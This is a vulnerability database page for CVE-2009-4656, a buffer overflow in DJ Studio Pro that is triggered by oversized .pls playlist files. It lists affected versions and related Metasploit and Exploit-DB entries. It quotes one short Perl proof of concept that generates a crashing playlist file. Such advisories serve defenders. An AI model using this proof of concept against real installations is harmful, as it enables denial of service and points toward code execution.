VIR Vulnerability Intelligence Relay

CVE-2009-4656

critical
Published 2010-03-03 Β· Modified 2026-04-29
πŸ’¬ Discuss on Community ✚ Propose mitigation
CVSS v3
β€”
CVSS v4 NEW
β€”
not yet in upstream
VIR risk
10.0

Description

Stack-based buffer overflow in E-Soft DJ Studio Pro 4.2 including 4.2.2.7.5, and 5.x including 5.1.4.3.1, allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a playlist file (.pls) containing a long string. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood
20%
Patch ETA
β€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β€” if you've already worked around this in production β€” publish your fix to the community-verified tier.

✚ Propose a mitigation on Community β†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9691 dos windows verified perl Β· 1 KB
prodigy Β· 2009-09-15

DJ Studio Pro 4.2 - '.pls' Local Crash

perl exploit Source: Exploit-DB 
#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
# 
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.pls";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-09-15]
EDB-18547 local windows verified
Metasploit Β· 2012-03-02

DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)

Source code queued for fetch β€” refresh in a moment.
EDB-18501 local windows
Death-Shadow-Dark Β· 2012-02-20

DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)

Source code queued for fetch β€” refresh in a moment.
EDB-10827 local windows verified
SΓ©bastien Duquette Β· 2009-12-30

DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)

Source code queued for fetch β€” refresh in a moment.

Metasploit modules

exploit_windows/fileformat/djstudio_pls_bof rank 300
DJ Studio Pro 5.1 .pls Stack Buffer Overflow
Source fetch failed: fetch_error β€” view the original via the link above.

Application impact
VendorProductVersionsFixed
e-soft.codj_studio_pro4.2
e-soft.codj_studio_pro4.2.2.7.5
e-soft.codj_studio_pro5.1
e-soft.codj_studio_pro5.1.4.3.1

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.